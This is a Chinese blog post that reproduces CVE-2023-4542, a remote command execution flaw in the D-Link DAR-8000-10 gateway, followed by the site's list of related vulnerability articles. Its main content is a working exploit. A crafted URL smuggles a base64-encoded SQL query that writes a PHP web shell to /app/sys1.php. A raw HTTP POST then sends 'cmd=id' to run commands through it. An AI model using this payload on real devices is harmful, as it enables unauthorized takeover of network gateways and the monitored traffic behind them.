D-Link DAR-8000-10 远程命令执行漏洞(CVE-2023-4542)

最新推荐文章于 2024-09-06 19:14:56 发布
最新推荐文章于 2024-09-06 19:14:56 发布
阅读量645 收藏 8
点赞数 18
文章标签: 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hot_milk1/article/details/136551696
版权

D-LINK-DAR-8000-10上网行为审计网关存在rce漏洞

官方网站: http://www.dlink.com.cn/

版本:D-LINK DAR-8000-10

查看登录页面。

构造网址: https://ip:port/importhtml.php?type=exporthtmlmail&tab=tb_RCtrlLog&sql=c2VsZWN0IDB4M2MzZjcwNjg3MDIwNjU2MzY4NmYyMDczNzk3Mzc0NjU2ZDI4MjQ1ZjUwNGY1MzU0NWIyMjYzNmQ2NDIyNWQyOT NiM2YzZSBpbnRvIG91dGZpbGUgJy91c3IvaGRkb2NzL25zZy9hcHAvc3lzMS5waHAn下载后然后执行poc:

POST /app/sys1.php HTTP/1.1
Host: xx.xxx.xx.xxx:xxx
Cookie:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 6

cmd=id

成功提交漏洞,获得CVE编号!

PumpkinBridge
关注
D-Link DAR-8000操作系统命令注入漏洞(含批量验证poc)
weixin_43567873的博客
04-04 69
D-Link DAR-8000操作系统命令注入漏洞(含批量验证poc)
漏洞复现】D-Link NAS设备nas_sharing.cgi接口存在远程命令执行漏洞CVE-2024-3273
失心少年
04-18 248
D-Link DNS-320是中国友讯(D-Link)公司的一款NAS(网络附属存储)设备。D-Link DNS-320L存在命令注入漏洞,该漏洞源于文件/cgi-bin/nas_sharing.cgi存在命令注入漏洞。受影响的产品和版本:D-Link DNS-320L,DNS-325,DNS-327,DNS-340L,D-Link NAS Storage。受影响的产品和版本:D-Link DNS-320L,DNS-325,DNS-327,DNS-340L,D-Link NAS Storage。
D-Link DAR-8000操作系统命令注入漏洞(CVE-2023-4542)
weixin_44304678的博客
11-03 472
D-Link DAR-8000是中国友讯(D-Link)公司的上网行为审计网关。该漏洞源于文件/app/sys1.php的参数id会导致操作系统命令注入。D-Link DAR-8000-10版本存在操作系统命令注入漏洞
保姆级CVE-2018-17066漏洞复现 DLink命令注入漏洞(更新完结)
最新发布
weixin_51339377的博客
09-06 376
之后按照之前复现的方式一样 我们丢到kali中执行binwalk解析。之后为了模拟 可以在kali里安装qemu-mipsel。在bin目录下可以尝试将goahead的环境搭配好。固件官网可以进行下载。
nginx cve-2023-4547超简单超详细的保姆级教程
2301_76467680的博客
07-05 258
抓包上传后缀为.jpg.php的文件(这里我先上传的是php文件里面写的一句话木马结果不成功之后图片码jpg还是不行于是才联合使用)jpg后面加两个空格(这里使用空格绕过)将空格的20改为00。
CVE-2024-34527 D-Link DSL-3782命令注入漏洞复现_dsl-3782_a1_eu_1
2401_84009749的博客
04-04 365
你的支持,我的动力;祝各位前程似锦,offer不断,步步高升!!!” />你的支持,我的动力;祝各位前程似锦,offer不断,步步高升!!!更多资料点击此处获qu!!
允许攻击者访问视频流:D-Link摄像头漏洞分析
systemino的博客
05-05 1432
概述 对于许多人来说,都希望通过安装“智能”摄像头,来提高家庭或办公室的安全性。一旦这些设备直接连接到互联网,只需点击几下,用户就可以轻松查看他们的监控视频流。然而,如果摄像头受到安全漏洞的影响,那么这种“便利性”将很快变成薄弱点,会给未经授权的攻击者打开大门。正如ESET智能家居研究团队的研究结果所显示的,D-Link DCS-2132L云端摄像头就正在面临这样的情况。该摄像头存在一系列安全漏...
dar64-2.6.13-win64.zip
02-22
DAR-磁盘存档 DAR-磁盘存档 用于完整,增量,压缩和加密的备份或存档 DAR是一种命令行备份和存档工具,它使用选择性压缩(不压缩已压缩的文件),强大的加密功能,可以将存档拆分为给定大小的不同文件并提供即时...
CAD快捷键-CAD常用快捷键命令大全.docx
11-15
本文档总结了 CAD 软件中常用的快捷键命令大全,包括绘图命令、修改命令、视窗缩放、尺寸标注、对象特性等多个方面。 一、绘图命令 在 CAD 软件中,绘图命令是最基本也是最重要的命令。通过这些命令,可以快速地...
node-v4.2.4-dar
01-18
node-v4.2.4-darwin-x64(Mac OS X Binaries).tar.gz node-v4.2.4-darwin-x64.tar.gz node.js for Mac OS X Binaries (.tar.gz) 64位 大小: 9.35 MB (9,813,549 字节)
Brandstetter-insecurity-In-Building-Automation-How-To-Create-Dar
10-25
1. 网络暴露:BAS通常连接到互联网以便远程监控和管理,但这也使其成为网络攻击的目标。 2. 设备漏洞:许多自动化设备可能存在未修补的安全漏洞,攻击者可利用这些漏洞进行入侵。 3. 数据保护:建筑自动化系统收集...
D-Link设备远程命令执行漏洞(CVE-2024-3273)
qq_69775412的博客
04-30 455
D-Link NAS设备nas_sharing.cgi接口存在远程命令执行漏洞
D-link850路由器漏洞挖掘与利用
weixin_43046297的博客
12-28 1926
D-link850文件结构和各部分功能: 分析小型路由器,D-link850是个经典案例,解析完固件后,首先要搞清楚文件系统,可以从前端入手,追踪其数据流向,看前端对应的后端二进制处理文件。 因此我们系统地梳理一下D-link850存在的相关漏洞及发现过程: 敏感信息泄露: 首先我们不知道漏洞的位置,我们仅通过前端的相关信息进行数据流的追踪: 快捷配置界面:bsc_easysetup.php 但是解析后的系统文件夹内有3处有bsc_easysetup.php(web文件下,webinc的bo.
D-Link RCE漏洞分析
weixin_43137410的博客
09-08 512
D-Link 5个安全漏洞
systemino的博客
08-25 2353
7月早些时间,研究人员爆出D-link 路由器固件镜像泄露了用来加密专用固件二进制文件的密钥。近日,又有ACE 团队研究人员爆出D-Link路由器的5个严重安全漏洞,攻击者利用这些漏洞可以实现网络入侵。此外,由于部分设备已经不再更新,因此无法修复。 漏洞概述 这些漏洞包括反射型XSS攻击、缓冲区溢出漏洞、认证绕过和任意代码执行,分别是: CVE-2020-15892 CVE-2020-15892漏洞是基于栈的缓冲区溢出漏洞漏洞位于ssi 二进制文件中,可能会引发任意命令执行CVE-2020-
在一款D-Link消费级路由器上,我发现了10个严重漏洞
热门推荐
weixin_33989058的博客
09-15 1万+
本文讲的是在一款D-Link消费级路由器上,我发现了10个严重漏洞,近期,信息安全研究员皮埃尔·金(Pierre·Kim)公开了D-Link DIR 850L消费级无线路由器存在的10个严重漏洞。 此次公开的D-Link漏洞涉及多方面问题,如缺乏对固件映像的适当保护机制,意味着黑客可以向目标设备注入包含后门的恶意拷贝,以及D-Link私有的mydlin...
D-Link系列家用路由器漏洞分析总结
Hello World.c
04-27 2258
D-Link系列家用路由器漏洞分析总结 ⚡ 尚未了解清楚 ❗ 已编写好完整POC ❓ 未能编写完整POC ❌ 暂时不能实际验证 DCS-2530L CVE-2020-25078 ❗ 敏感信息泄露 D-Link DCS-1100 || DCS-1130 CVE-2017-8416 ⚡ DIR-850L cgi动态web服务器 CVE-2017-3193 ❗ 认证前栈溢出 CVE-2017-14421 ❗ 路由器后门 DIR-816 独立web服务器 CVE-2021-27114 ❓ 认证后栈溢出 CVE
D-Link DAP-1860:远程命令执行和认证绕过漏洞
NOSEC2019的博客
12-10 930
介绍 2019年9月,我在D-Link Access Point(DAP-1860)上发现了两个漏洞,分别是命令注入导致的远程代码执行和身份验证绕过。这两个漏洞能帮助攻击者在不进行身份验证的情况下远程控制设备。如果你的上网设备是从D-Link购买的,并且型号是DAP-1860,请立刻更新固件或联系厂商寻求帮助,因为我发现的漏洞影响了当时最新版本的DAP-1860固件。 以下是DAP-1860的W...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值